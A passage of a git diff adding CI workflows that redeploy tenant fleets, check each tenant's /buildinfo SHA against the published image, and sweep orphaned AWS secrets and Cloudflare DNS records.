"Content-Type: application/json" \ + -X POST "$CP_URL/cp/admin/tenants/redeploy-fleet" \ + -d "$BODY" >"$HTTP_CODE_FILE" + set -e + # Stderr from curl (e.g. dial errors with -sS) goes to the runner + # log so operators can see WHY a connection failed. Stdout is + # captured to $HTTP_CODE_FILE because that's where -w writes. + HTTP_CODE=$(cat "$HTTP_CODE_FILE" 2>/dev/null || echo "000") + [ -z "$HTTP_CODE" ] && HTTP_CODE="000" + + echo "HTTP $HTTP_CODE" + cat "$HTTP_RESPONSE" | jq . || cat "$HTTP_RESPONSE" + + # Pretty-print per-tenant results in the job summary so + # ops can see which tenants were redeployed without drilling + # into the raw response. + { + echo "## Tenant redeploy fleet" + echo "" + echo "**Target tag:** \`$TARGET_TAG\`" + echo "**Canary:** \`$CANARY_SLUG\` (soak ${SOAK_SECONDS}s)" + echo "**Batch size:** $BATCH_SIZE" + echo "**Dry run:** $DRY_RUN" + echo "**HTTP:** $HTTP_CODE" + echo "" + echo "### Per-tenant result" + echo "" + echo '| Slug | Phase | SSM Status | Exit | Healthz | Error |' + echo '|------|-------|------------|------|---------|-------|' + jq -r '.results[]? | "| \(.slug) | \(.phase) | \(.ssm_status // "-") | \(.ssm_exit_code) | \(.healthz_ok) | \(.error // "-") |"' "$HTTP_RESPONSE" || true + } >> "$GITHUB_STEP_SUMMARY" + + if [ "$HTTP_CODE" != "200" ]; then + echo "::error::redeploy-fleet returned HTTP $HTTP_CODE" + exit 1 + fi + OK=$(jq -r '.ok' "$HTTP_RESPONSE") + if [ "$OK" != "true" ]; then + echo "::error::redeploy-fleet reported ok=false (see summary for which tenant halted the rollout)" + exit 1 + fi + echo "::notice::Tenant fleet redeploy reported ssm_status=Success — verifying actual image roll on each tenant..." + + # Stash the response for the verify step. $RUNNER_TEMP outlasts + # the step boundary; $HTTP_RESPONSE doesn't. + cp "$HTTP_RESPONSE" "$RUNNER_TEMP/redeploy-response.json" + + - name: Verify each tenant /buildinfo matches published SHA + # ROOT FIX FOR #2395. + # + # `redeploy-fleet`'s `ssm_status=Success` means "the SSM RPC + # didn't error" — NOT "the new image is running on the tenant." + # `:latest` lives in the local Docker daemon's image cache; if + # the SSM document does `docker compose up -d` without an + # explicit `docker pull`, the daemon serves the previously- + # cached digest and the container restarts on stale code. + # 2026-04-30 incident: hongmingwang's tenant reported + # ssm_status=Success at 17:00:53Z but kept serving pre-501a42d7 + # chat_files for 30+ min — the lazy-heal fix never reached the + # user despite green deploy + green redeploy. + # + # This step closes the gap by curling each tenant's /buildinfo + # endpoint (added in workspace-server/internal/buildinfo + + # /Dockerfile* GIT_SHA build-arg, this PR) and comparing the + # returned git_sha to the SHA the workflow expects. Mismatches + # fail the workflow, which is what `ok=true` should have + # guaranteed all along. + # + # When the redeploy was triggered by workflow_dispatch with a + # specific tag (target_tag != "latest"), the expected SHA may + # not equal ${{ github.sha }} — in that case we resolve via + # GHCR's manifest. For workflow_run (default :latest) the + # workflow_run.head_sha is the SHA that just published. + env: + EXPECTED_SHA: ${{ github.event.workflow_run.head_sha || github.sha }} + TARGET_TAG: ${{ steps.tag.outputs.target_tag }} + # Tenant subdomain template — slugs from the response are + # appended. Production CP issues `.moleculesai.app`; + # staging CP issues `.staging.moleculesai.app`. This + # workflow runs on main → prod CP → no `staging.` infix. + TENANT_DOMAIN: 'moleculesai.app' + run: | + set -euo pipefail + + EXPECTED_SHORT="${EXPECTED_SHA:0:7}" + if [ "$TARGET_TAG" != "latest" ] \ + && [ "$TARGET_TAG" != "$EXPECTED_SHA" ] \ + && [ "$TARGET_TAG" != "staging-$EXPECTED_SHORT" ]; then + # workflow_dispatch with a pinned tag that isn't the head + # SHA — operator is rolling back / pinning. Skip the + # verification because we don't have the expected SHA in + # this context (would need to crane-inspect the GHCR + # manifest, which is a follow-up). Failing-open here is + # safe: the operator chose the tag deliberately. + # + # `staging-` IS verified — it's the new + # auto-trigger default (see Compute target tag step) and + # the digest under that tag SHOULD match EXPECTED_SHA. + echo "::notice::target_tag=$TARGET_TAG (operator-pinned) — skipping per-tenant SHA verification." + exit 0 + fi + + RESP="$RUNNER_TEMP/redeploy-response.json" + if [ ! -s "$RESP" ]; then + echo "::error::redeploy-response.json missing or empty — verify step ran without a response to read" + exit 1 + fi + + # Pull only successfully-redeployed tenants. Any tenant that + # halted the rollout already failed the previous step, so we + # don't double-count them here. + mapfile -t SLUGS < <(jq -r '.results[]? | select(.healthz_ok == true) | .slug' "$RESP") + if [ ${#SLUGS[@]} -eq 0 ]; then + echo "::warning::No tenants reported healthz_ok — nothing to verify" + exit 0 + fi + + echo "Verifying ${#SLUGS[@]} tenant(s) against EXPECTED_SHA=${EXPECTED_SHA:0:7}..." + + # Two distinct failure modes — STALE (the #2395 bug class, hard-fail) + # vs UNREACHABLE (teardown race, soft-warn). See the staging variant's + # comment for the full rationale; same logic applies on prod even + # though prod has fewer ephemeral tenants — the asymmetry would be a + # gratuitous fork. + STALE_COUNT=0 + UNREACHABLE_COUNT=0 + STALE_LINES=() + UNREACHABLE_LINES=() + for slug in "${SLUGS[@]}"; do + URL="https://${slug}.${TENANT_DOMAIN}/buildinfo" + # 30s total: tenant just SSM-restarted, may still be coming + # up. Retry-on-empty rather than retry-on-status — we want + # to fail fast on "responded with wrong SHA", not "still + # warming up". + BODY=$(curl -sS --max-time 30 --retry 3 --retry-delay 5 --retry-connrefused "$URL" || true) + ACTUAL_SHA=$(echo "$BODY" | jq -r '.git_sha // ""' 2>/dev/null || echo "") + if [ -z "$ACTUAL_SHA" ]; then + UNREACHABLE_COUNT=$((UNREACHABLE_COUNT + 1)) + UNREACHABLE_LINES+=("| $slug | (no /buildinfo response) | ${EXPECTED_SHA:0:7} | ⚠ unreachable (likely teardown race) |") + continue + fi + if [ "$ACTUAL_SHA" = "$EXPECTED_SHA" ]; then + echo " $slug: ${ACTUAL_SHA:0:7} ✓" + else + STALE_COUNT=$((STALE_COUNT + 1)) + STALE_LINES+=("| $slug | ${ACTUAL_SHA:0:7} | ${EXPECTED_SHA:0:7} | ❌ stale |") + fi + done + + { + echo "" + echo "### Per-tenant /buildinfo verification" + echo "" + echo "Expected SHA: \`${EXPECTED_SHA:0:7}\`" + echo "" + if [ $STALE_COUNT -gt 0 ]; then + echo "**${STALE_COUNT} STALE tenant(s) — these did NOT pick up the new image despite ssm_status=Success:**" + echo "" + echo "| Slug | Actual /buildinfo SHA | Expected | Status |" + echo "|------|----------------------|----------|--------|" + for line in "${STALE_LINES[@]}"; do echo "$line"; done + echo "" + fi + if [ $UNREACHABLE_COUNT -gt 0 ]; then + echo "**${UNREACHABLE_COUNT} unreachable tenant(s) — likely teardown race (soft-warn, not failing):**" + echo "" + echo "| Slug | Actual /buildinfo SHA | Expected | Status |" + echo "|------|----------------------|----------|--------|" + for line in "${UNREACHABLE_LINES[@]}"; do echo "$line"; done + echo "" + fi + if [ $STALE_COUNT -eq 0 ] && [ $UNREACHABLE_COUNT -eq 0 ]; then + echo "All ${#SLUGS[@]} tenants returned matching SHA. ✓" + fi + } >> "$GITHUB_STEP_SUMMARY" + + if [ $UNREACHABLE_COUNT -gt 0 ]; then + echo "::warning::$UNREACHABLE_COUNT tenant(s) unreachable post-redeploy. Likely benign teardown race — CP healthz monitor catches real outages." + fi + + # Belt-and-suspenders sanity floor: same logic as the staging + # variant — see that file's comment for the full rationale. + # Floor only applies when fleet >= 4; below that, canary-verify + # is the actual gate. + TOTAL_VERIFIED=${#SLUGS[@]} + if [ $TOTAL_VERIFIED -ge 4 ] && [ $UNREACHABLE_COUNT -gt $((TOTAL_VERIFIED / 2)) ]; then + echo "::error::$UNREACHABLE_COUNT of $TOTAL_VERIFIED tenant(s) unreachable — exceeds 50% threshold on a fleet large enough that this signals a real outage, not teardown race." + exit 1 + fi + + if [ $STALE_COUNT -gt 0 ]; then + echo "::error::$STALE_COUNT tenant(s) returned a stale SHA. ssm_status=Success was misleading — see job summary." + exit 1 + fi + + echo "::notice::Tenant fleet redeploy complete — all reachable tenants on ${EXPECTED_SHA:0:7} (${UNREACHABLE_COUNT} unreachable, soft-warned)." diff --git a/.gitea/workflows/redeploy-tenants-on-staging.yml b/.gitea/workflows/redeploy-tenants-on-staging.yml new file mode 100644 index 00000000..6243d3f9 --- /dev/null +++ b/.gitea/workflows/redeploy-tenants-on-staging.yml @@ -0,0 +1,356 @@ +name: redeploy-tenants-on-staging + +# Ported from .github/workflows/redeploy-tenants-on-staging.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# - **Gitea workflow_run trigger limitation**: Gitea 1.22.6's support +# for the `workflow_run` event is partial. If this never fires on a +# real publish-workspace-server-image completion, the follow-up +# triage PR should replace the trigger with a push-with-paths-filter +# on .gitea/workflows/publish-workspace-server-image.yml. Until +# then continue-on-error+dead-workflow doesn't break anything. +# + +# Auto-refresh staging tenant EC2s after every staging-branch merge. +# +# Mirror of redeploy-tenants-on-main.yml, with the staging-CP host and +# the :staging-latest tag. Sister workflow exists for prod (rolls +# :latest after canary-verify). Both share the same shape — just +# different CP_URL + target_tag + admin token secret. +# +# Why this workflow exists: publish-workspace-server-image now builds +# on every staging-branch push (PR #2335), pushing +# platform-tenant:staging-latest to GHCR. Existing tenants pulled +# their image once at boot and never re-pull, so the new image just +# sits unused until the tenant is reprovisioned. +# +# This workflow closes the gap by calling staging-CP's +# /cp/admin/tenants/redeploy-fleet, which performs a canary-first, +# batched, health-gated SSM redeploy across every live staging tenant. +# Same endpoint shape as prod CP — only the host differs. +# +# Runtime ordering: +# 1. publish-workspace-server-image completes on staging branch → +# new :staging-latest in GHCR. +# 2. This workflow fires via workflow_run, waits 30s for GHCR's CDN +# to propagate the new tag. +# 3. Calls redeploy-fleet with no canary (staging IS canary; we don't +# need a sub-canary inside it). Soak still applies to the first +# tenant in case of bad-deploy detection. +# 4. Any failure aborts the rollout and leaves older tenants on the +# prior image — safer default than half-and-half state. +# +# Rollback path: re-run with workflow_dispatch + target_tag=staging- +# of a known-good build. + +on: + workflow_run: + workflows: ['publish-workspace-server-image'] + types: [completed] + branches: [main] +permissions: + contents: read + # No write scopes needed — the workflow hits an external CP endpoint, + # not the GitHub API. + +# Serialize per-branch so two rapid staging pushes' redeploys don't +# overlap and cause confusing per-tenant SSM state. cancel-in-progress +# is false because aborting a half-rolled-out fleet leaves tenants +# stuck on whatever image they happened to be on when cancelled. +concurrency: + group: redeploy-tenants-on-staging + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + redeploy: + # Skip the auto-trigger if publish-workspace-server-image didn't + # actually succeed. workflow_run fires on any completion state; we + # don't want to redeploy against a half-built image. + # NOTE (Gitea port): workflow_dispatch trigger dropped; only the + # workflow_run path remains. + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 25 + steps: + - name: Wait for GHCR tag propagation + # GHCR's edge cache takes ~15-30s to consistently serve the new + # :staging-latest manifest after the registry accepts the push. + # Same rationale as redeploy-tenants-on-main.yml. + run: sleep 30 + + - name: Call staging-CP redeploy-fleet + # CP_STAGING_ADMIN_API_TOKEN must be set as a repo/org secret + # on molecule-ai/molecule-core, matching staging-CP's + # CP_ADMIN_API_TOKEN env var (visible in Railway controlplane + # / staging environment). Stored separately from the prod + # CP_ADMIN_API_TOKEN so a leak of one doesn't auth the other. + env: + CP_URL: ${{ vars.STAGING_CP_URL || 'https://staging-api.moleculesai.app' }} + CP_STAGING_ADMIN_API_TOKEN: ${{ secrets.CP_STAGING_ADMIN_API_TOKEN }} + TARGET_TAG: ${{ inputs.target_tag || 'staging-latest' }} + CANARY_SLUG: ${{ inputs.canary_slug || '' }} + SOAK_SECONDS: ${{ inputs.soak_seconds || '60' }} + BATCH_SIZE: ${{ inputs.batch_size || '3' }} + DRY_RUN: ${{ inputs.dry_run || false }} + run: | + set -euo pipefail + + # Schedule-vs-dispatch hardening (mirrors sweep-cf-orphans + # and sweep-cf-tunnels): hard-fail on auto-trigger when the + # secret is missing so a misconfigured-repo doesn't silently + # serve stale staging tenants. Soft-skip on operator dispatch. + if [ -z "${CP_STAGING_ADMIN_API_TOKEN:-}" ]; then + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "::warning::CP_STAGING_ADMIN_API_TOKEN secret not set — skipping redeploy" + echo "::warning::Set CP_STAGING_ADMIN_API_TOKEN in repo secrets to enable auto-redeploy." + echo "::notice::Pull the value from staging-CP's CP_ADMIN_API_TOKEN env in Railway." + exit 0 + fi + echo "::error::staging redeploy cannot run — CP_STAGING_ADMIN_API_TOKEN secret missing" + echo "::error::set it at Settings → Secrets and Variables → Actions; pull from staging-CP's CP_ADMIN_API_TOKEN env in Railway." + exit 1 + fi + + BODY=$(jq -nc \ + --arg tag "$TARGET_TAG" \ + --arg canary "$CANARY_SLUG" \ + --argjson soak "$SOAK_SECONDS" \ + --argjson batch "$BATCH_SIZE" \ + --argjson dry "$DRY_RUN" \ + '{ + target_tag: $tag, + canary_slug: $canary, + soak_seconds: $soak, + batch_size: $batch, + dry_run: $dry + }') + + echo "POST $CP_URL/cp/admin/tenants/redeploy-fleet" + echo " body: $BODY" + + HTTP_RESPONSE=$(mktemp) + HTTP_CODE_FILE=$(mktemp) + # Route -w into its own tempfile so curl's exit code (e.g. 56 + # on connection-reset) can't pollute the captured stdout. The + # previous inline-substitution shape produced "000000" on + # connection reset — caught on main variant 2026-05-04 + # redeploying sha 2b862f6. Same fix shape as the synth-E2E + # §9c gate (PR #2797). See lint-curl-status-capture.yml for + # the CI gate that pins this fix shape. + set +e + curl -sS -o "$HTTP_RESPONSE" -w '%{http_code}' \ + -m 1200 \ + -H "Authorization: Bearer $CP_STAGING_ADMIN_API_TOKEN" \ + -H "Content-Type: application/json" \ + -X POST "$CP_URL/cp/admin/tenants/redeploy-fleet" \ + -d "$BODY" >"$HTTP_CODE_FILE" + set -e + # Stderr from curl (-sS shows dial errors etc.) goes to the + # runner log so operators can see WHY a connection failed. + HTTP_CODE=$(cat "$HTTP_CODE_FILE" 2>/dev/null || echo "000") + [ -z "$HTTP_CODE" ] && HTTP_CODE="000" + + echo "HTTP $HTTP_CODE" + cat "$HTTP_RESPONSE" | jq . || cat "$HTTP_RESPONSE" + + { + echo "## Staging tenant redeploy fleet" + echo "" + echo "**Target tag:** \`$TARGET_TAG\`" + echo "**Canary:** \`${CANARY_SLUG:-(none — staging is itself the canary)}\` (soak ${SOAK_SECONDS}s)" + echo "**Batch size:** $BATCH_SIZE" + echo "**Dry run:** $DRY_RUN" + echo "**HTTP:** $HTTP_CODE" + echo "" + echo "### Per-tenant result" + echo "" + echo '| Slug | Phase | SSM Status | Exit | Healthz | Error |' + echo '|------|-------|------------|------|---------|-------|' + jq -r '.results[]? | "| \(.slug) | \(.phase) | \(.ssm_status // "-") | \(.ssm_exit_code) | \(.healthz_ok) | \(.error // "-") |"' "$HTTP_RESPONSE" || true + } >> "$GITHUB_STEP_SUMMARY" + + # Distinguish "real fleet failure" from "E2E teardown race". + # + # CP returns HTTP 500 + ok=false whenever ANY tenant in the + # fleet failed SSM or healthz. In practice the recurring source + # of these is ephemeral test tenants being torn down by their + # parent E2E run mid-redeploy: the EC2 dies → SSM exit=2 or + # healthz timeout → CP marks the fleet failed → this workflow + # goes red even though every operator-facing tenant rolled fine. + # + # Ephemeral slug prefixes (kept in sync with sweep-stale-e2e-orgs.yml + # — see that file for the source-of-truth list and rationale): + # - e2e-* — canvas/saas/ext E2E suites + # - rt-e2e-* — runtime-test harness fixtures (RFC #2251) + # Long-lived prefixes that are NOT ephemeral and MUST hard-fail: + # demo-prep, dryrun-*, dryrun2-*, plus all human tenant slugs. + # + # Filter: if HTTP=500/ok=false AND every failed slug matches an + # ephemeral prefix, treat as soft-warn and let the verify step + # downstream handle unreachable-vs-stale (#2402). Any non-ephemeral + # failure or a non-500 HTTP response remains a hard failure. + OK=$(jq -r '.ok // "false"' "$HTTP_RESPONSE") + FAILED_SLUGS=$(jq -r ' + .results[]? + | select((.healthz_ok != true) or (.ssm_status != "Success")) + | .slug' "$HTTP_RESPONSE" 2>/dev/null || true) + EPHEMERAL_PREFIX_RE='^(e2e-|rt-e2e-)' + NON_EPHEMERAL_FAILED=$(printf '%s\n' "$FAILED_SLUGS" | grep -v '^$' | grep -Ev "$EPHEMERAL_PREFIX_RE" || true) + + if [ "$HTTP_CODE" = "200" ] && [ "$OK" = "true" ]; then + : # happy path — fall through to verification + elif [ "$HTTP_CODE" = "500" ] && [ -z "$NON_EPHEMERAL_FAILED" ] && [ -n "$FAILED_SLUGS" ]; then + COUNT=$(printf '%s\n' "$FAILED_SLUGS" | grep -Ec "$EPHEMERAL_PREFIX_RE" || true) + echo "::warning::redeploy-fleet returned HTTP 500 but every failed tenant ($COUNT) is ephemeral (e2e-*/rt-e2e-*) — treating as teardown race, soft-warning." + printf '%s\n' "$FAILED_SLUGS" | sed 's/^/::warning:: failed: /' + elif [ "$HTTP_CODE" != "200" ]; then + echo "::error::redeploy-fleet returned HTTP $HTTP_CODE" + if [ -n "$NON_EPHEMERAL_FAILED" ]; then + echo "::error::non-ephemeral tenant(s) failed:" + printf '%s\n' "$NON_EPHEMERAL_FAILED" | sed 's/^/::error:: /' + fi + exit 1 + else + # HTTP=200 but ok=false (shouldn't happen with current CP + # but keep the gate for completeness). + echo "::error::redeploy-fleet reported ok=false (see summary for which tenant halted the rollout)" + exit 1 + fi + echo "::notice::Staging tenant fleet redeploy reported ssm_status=Success — verifying actual image roll on each tenant..." + + cp "$HTTP_RESPONSE" "$RUNNER_TEMP/redeploy-response.json" + + - name: Verify each staging tenant /buildinfo matches published SHA + # Mirror of the verify step in redeploy-tenants-on-main.yml — see + # there for the rationale (#2395 root fix). Staging has the same + # ssm_status-success-but-stale-image hazard and benefits from the + # same gate. Diff: TENANT_DOMAIN includes the `staging.` infix. + env: + EXPECTED_SHA: ${{ github.event.workflow_run.head_sha || github.sha }} + TARGET_TAG: ${{ inputs.target_tag || 'staging-latest' }} + TENANT_DOMAIN: 'staging.moleculesai.app' + run: | + set -euo pipefail + + # staging-latest is the staging-side moving tag; treat it the + # same way main treats `latest`. Operator-pinned SHAs skip + # verification (see main variant for why). + if [ "$TARGET_TAG" != "staging-latest" ] && [ "$TARGET_TAG" != "latest" ] && [ "$TARGET_TAG" != "$EXPECTED_SHA" ]; then + echo "::notice::target_tag=$TARGET_TAG (operator-pinned) — skipping per-tenant SHA verification." + exit 0 + fi + + RESP="$RUNNER_TEMP/redeploy-response.json" + if [ ! -s "$RESP" ]; then + echo "::error::redeploy-response.json missing or empty" + exit 1 + fi + + mapfile -t SLUGS < <(jq -r '.results[]? | select(.healthz_ok == true) | .slug' "$RESP") + if [ ${#SLUGS[@]} -eq 0 ]; then + echo "::warning::No staging tenants reported healthz_ok — nothing to verify" + exit 0 + fi + + echo "Verifying ${#SLUGS[@]} staging tenant(s) against EXPECTED_SHA=${EXPECTED_SHA:0:7}..." + + # Two distinct failure modes here: + # STALE_COUNT — tenant returned a SHA that doesn't match. THIS is + # the #2395 bug class: tenant up + serving old code. + # Always hard-fail the workflow. + # UNREACHABLE_COUNT — tenant didn't respond. Almost always a benign + # teardown race: redeploy-fleet snapshot says + # healthz_ok=true, then the E2E suite tears the + # ephemeral tenant down before this step runs (the + # e2e-* fixtures churn 5-10/hour on staging). Soft- + # warn so we don't block staging→main on cleanup. + # Real "tenant up but unreachable" is caught by CP's + # own healthz monitor + the post-redeploy alert; we + # don't need to double-count it here. + STALE_COUNT=0 + UNREACHABLE_COUNT=0 + STALE_LINES=() + UNREACHABLE_LINES=() + for slug in "${SLUGS[@]}"; do + URL="https://${slug}.${TENANT_DOMAIN}/buildinfo" + BODY=$(curl -sS --max-time 30 --retry 3 --retry-delay 5 --retry-connrefused "$URL" || true) + ACTUAL_SHA=$(echo "$BODY" | jq -r '.git_sha // ""' 2>/dev/null || echo "") + if [ -z "$ACTUAL_SHA" ]; then + UNREACHABLE_COUNT=$((UNREACHABLE_COUNT + 1)) + UNREACHABLE_LINES+=("| $slug | (no /buildinfo response) | ${EXPECTED_SHA:0:7} | ⚠ unreachable (likely teardown race) |") + continue + fi + if [ "$ACTUAL_SHA" = "$EXPECTED_SHA" ]; then + echo " $slug: ${ACTUAL_SHA:0:7} ✓" + else + STALE_COUNT=$((STALE_COUNT + 1)) + STALE_LINES+=("| $slug | ${ACTUAL_SHA:0:7} | ${EXPECTED_SHA:0:7} | ❌ stale |") + fi + done + + { + echo "" + echo "### Per-tenant /buildinfo verification (staging)" + echo "" + echo "Expected SHA: \`${EXPECTED_SHA:0:7}\`" + echo "" + if [ $STALE_COUNT -gt 0 ]; then + echo "**${STALE_COUNT} STALE tenant(s) — these did NOT pick up the new image despite ssm_status=Success:**" + echo "" + echo "| Slug | Actual /buildinfo SHA | Expected | Status |" + echo "|------|----------------------|----------|--------|" + for line in "${STALE_LINES[@]}"; do echo "$line"; done + echo "" + fi + if [ $UNREACHABLE_COUNT -gt 0 ]; then + echo "**${UNREACHABLE_COUNT} unreachable tenant(s) — likely E2E teardown race (soft-warn, not failing):**" + echo "" + echo "| Slug | Actual /buildinfo SHA | Expected | Status |" + echo "|------|----------------------|----------|--------|" + for line in "${UNREACHABLE_LINES[@]}"; do echo "$line"; done + echo "" + fi + if [ $STALE_COUNT -eq 0 ] && [ $UNREACHABLE_COUNT -eq 0 ]; then + echo "All ${#SLUGS[@]} staging tenants returned matching SHA. ✓" + fi + } >> "$GITHUB_STEP_SUMMARY" + + if [ $UNREACHABLE_COUNT -gt 0 ]; then + echo "::warning::$UNREACHABLE_COUNT staging tenant(s) unreachable post-redeploy. Likely benign teardown race — CP healthz monitor catches real outages." + fi + + # Belt-and-suspenders sanity floor: if MORE than half the fleet is + # unreachable AND the fleet is large enough that "half down" is + # statistically meaningful, this is a real outage (e.g. new image + # crashes on startup), not a teardown race. Hard-fail. + # + # Floor only applies when TOTAL_VERIFIED >= 4 — below that, the + # canary-verify step is the actual gate for "all tenants down" + # detection (it runs against the canary first and aborts the + # rollout if the canary fails to come up). Without the >=4 gate, + # a 1-tenant fleet (e.g. a single ephemeral e2e-* tenant on a + # quiet staging push) would re-flake on the exact teardown-race + # condition #2402 fixed: 1 of 1 unreachable = 100% > 50% → fail. + TOTAL_VERIFIED=${#SLUGS[@]} + if [ $TOTAL_VERIFIED -ge 4 ] && [ $UNREACHABLE_COUNT -gt $((TOTAL_VERIFIED / 2)) ]; then + echo "::error::$UNREACHABLE_COUNT of $TOTAL_VERIFIED staging tenant(s) unreachable — exceeds 50% threshold on a fleet large enough that this signals a real outage, not teardown race." + exit 1 + fi + + if [ $STALE_COUNT -gt 0 ]; then + echo "::error::$STALE_COUNT staging tenant(s) returned a stale SHA. ssm_status=Success was misleading — see job summary." + exit 1 + fi + + echo "::notice::Staging tenant fleet redeploy complete — all reachable tenants on ${EXPECTED_SHA:0:7} (${UNREACHABLE_COUNT} unreachable, soft-warned)." diff --git a/.gitea/workflows/sweep-aws-secrets.yml b/.gitea/workflows/sweep-aws-secrets.yml new file mode 100644 index 00000000..afa8f6fa --- /dev/null +++ b/.gitea/workflows/sweep-aws-secrets.yml @@ -0,0 +1,129 @@ +name: Sweep stale AWS Secrets Manager secrets + +# Ported from .github/workflows/sweep-aws-secrets.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Janitor for per-tenant AWS Secrets Manager secrets +# (`molecule/tenant//bootstrap`) whose backing tenant no +# longer exists. Parallel-shape to sweep-cf-tunnels.yml and +# sweep-cf-orphans.yml — different cloud, same justification. +# +# Why this exists separately from a long-term reconciler integration: +# - molecule-controlplane's tenant_resources audit table (mig 024) +# currently tracks four resource kinds: CloudflareTunnel, +# CloudflareDNS, EC2Instance, SecurityGroup. SecretsManager is +# not in the list, so the existing reconciler doesn't catch +# orphan secrets. +# - At ~$0.40/secret/month the cost grew to ~$19/month before this +# sweeper was written, indicating ~45+ orphan secrets from +# crashed provisions and incomplete deprovision flows. +# - The proper fix (KindSecretsManagerSecret + recorder hook + +# reconciler enumerator) is filed as a separate controlplane +# issue. This sweeper is the immediate cost-relief stopgap. +# +# IAM principal: AWS_JANITOR_ACCESS_KEY_ID / AWS_JANITOR_SECRET_ACCESS_KEY. +# This is a DEDICATED principal — the production `molecule-cp` IAM +# user lacks `secretsmanager:ListSecrets` (it only has +# Get/Create/Update/Delete on specific resources, scoped to its +# operational needs). The janitor needs ListSecrets across the +# `molecule/tenant/*` prefix, which warrants a separate principal so +# we don't broaden the prod-CP policy. +# +# Safety: the script's MAX_DELETE_PCT gate (default 50%, mirroring +# sweep-cf-orphans.yml — tenant secrets are durable by design, unlike +# the mostly-orphan tunnels) refuses to nuke past the threshold. + +on: + schedule: + # Hourly at :30 — offsets from sweep-cf-orphans (:15) and + # sweep-cf-tunnels (:45) so the three janitors don't burst the + # CP admin endpoints at the same minute. + - cron: '30 * * * *' +# Don't let two sweeps race the same AWS account. +concurrency: + group: sweep-aws-secrets + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + sweep: + name: Sweep AWS Secrets Manager + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # 30 min cap, mirroring the other janitors. AWS DeleteSecret is + # fast (~0.3s/call) so even a 100+ backlog drains in seconds + # under the 8-way xargs parallelism, but the cap is set generously + # to leave headroom for any actual API hang. + timeout-minutes: 30 + env: + AWS_REGION: ${{ secrets.AWS_REGION || 'us-east-1' }} + AWS_ACCESS_KEY_ID: ${{ secrets.AWS_JANITOR_ACCESS_KEY_ID }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_JANITOR_SECRET_ACCESS_KEY }} + CP_PROD_ADMIN_TOKEN: ${{ secrets.CP_PROD_ADMIN_TOKEN }} + CP_STAGING_ADMIN_TOKEN: ${{ secrets.CP_STAGING_ADMIN_TOKEN }} + MAX_DELETE_PCT: ${{ github.event.inputs.max_delete_pct || '50' }} + GRACE_HOURS: ${{ github.event.inputs.grace_hours || '24' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify required secrets present + id: verify + # Schedule-vs-dispatch behaviour split mirrors sweep-cf-orphans + # and sweep-cf-tunnels (hardened 2026-04-28). Same principle: + # - schedule → exit 1 on missing secrets (red CI surfaces it) + # - workflow_dispatch → exit 0 with warning (operator-driven, + # they already accepted the repo state) + run: | + missing=() + for var in AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY CP_PROD_ADMIN_TOKEN CP_STAGING_ADMIN_TOKEN; do + if [ -z "${!var:-}" ]; then + missing+=("$var") + fi + done + if [ ${#missing[@]} -gt 0 ]; then + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "::warning::skipping sweep — secrets not configured: ${missing[*]}" + echo "::warning::set them at Settings → Secrets and Variables → Actions, then rerun." + echo "::warning::AWS_JANITOR_* must belong to a principal with secretsmanager:ListSecrets and secretsmanager:DeleteSecret on molecule/tenant/* (the prod molecule-cp principal lacks ListSecrets)." + echo "skip=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + echo "::error::sweep cannot run — required secrets missing: ${missing[*]}" + echo "::error::set them at Settings → Secrets and Variables → Actions, or disable this workflow." + echo "::error::AWS_JANITOR_* must belong to a principal with secretsmanager:ListSecrets and secretsmanager:DeleteSecret on molecule/tenant/*." + exit 1 + fi + echo "All required secrets present ✓" + echo "skip=false" >> "$GITHUB_OUTPUT" + + - name: Run sweep + if: steps.verify.outputs.skip != 'true' + # Schedule-vs-dispatch dry-run asymmetry mirrors sweep-cf-tunnels: + # - Scheduled: input empty → "false" → --execute (the whole + # point of an hourly janitor). + # - Manual workflow_dispatch: input default true → dry-run; + # operator must flip it to actually delete. + run: | + set -euo pipefail + if [ "${{ github.event.inputs.dry_run || 'false' }}" = "true" ]; then + echo "Running in dry-run mode — no deletions" + bash scripts/ops/sweep-aws-secrets.sh + else + echo "Running with --execute — will delete identified orphans" + bash scripts/ops/sweep-aws-secrets.sh --execute + fi diff --git a/.gitea/workflows/sweep-cf-orphans.yml b/.gitea/workflows/sweep-cf-orphans.yml new file mode 100644 index 00000000..18dc41cb --- /dev/null +++ b/.gitea/workflows/sweep-cf-orphans.yml @@ -0,0 +1,151 @@ +name: Sweep stale Cloudflare DNS records + +# Ported from .github/workflows/sweep-cf-orphans.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - 